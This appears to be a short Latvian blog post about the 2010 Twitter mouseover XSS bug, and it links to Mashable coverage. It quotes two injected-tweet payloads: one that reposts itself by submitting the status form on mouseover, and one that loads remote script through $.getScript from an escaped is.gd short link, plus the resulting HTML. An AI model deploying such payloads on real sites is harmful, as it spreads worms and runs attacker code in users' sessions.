Izskatās, ka kāds veiksmīgi atradis HTML injection caurumu vecajā www.twitter.com versijā, kas nepareizi apstrādā HTML + Javascript tvītus un diezgan viegli, piemēram, ļauj izveodot mouseover retvītu.

Kods1, kas tiek retvītots:

http://a.no/@”onmouseover=”;$(‘textarea:first’).val(this.innerHTML);$(‘.status-update-form’).submit()” style=”color:#000;background:#000;/

Kods2 jau no HTML

http://t.co/@”style=”font-size:999999999999px;”onmouseover=”$.getScript(‘http:\u002f\u002fis.gd\u002ffl9A7’)”/

un attiecīgais HTML:

<a target=”_blank” rel=”nofollow” onmouseover=”$.getScript(‘http:\u002f\u002fis.gd\u002ffl9A7’)” style=”font-size: 1e+12px;” href=”http://t.co/@”>http://t.co/@”style=”font-size:999999999999px;”onmouseover=”$.getScript(‘http:\u002f\u002fis.gd\u002ffl9A7’)”/</a>

Un rezultāts izskatās kaut kā šādi:

un šādi (īstais burtu izmērs uzstādīts kā 1e+12px, šeit attēloti 90px izmērā:

Reku arī International: http://mashable.com/2010/09/21/twitter-mouseover-bug/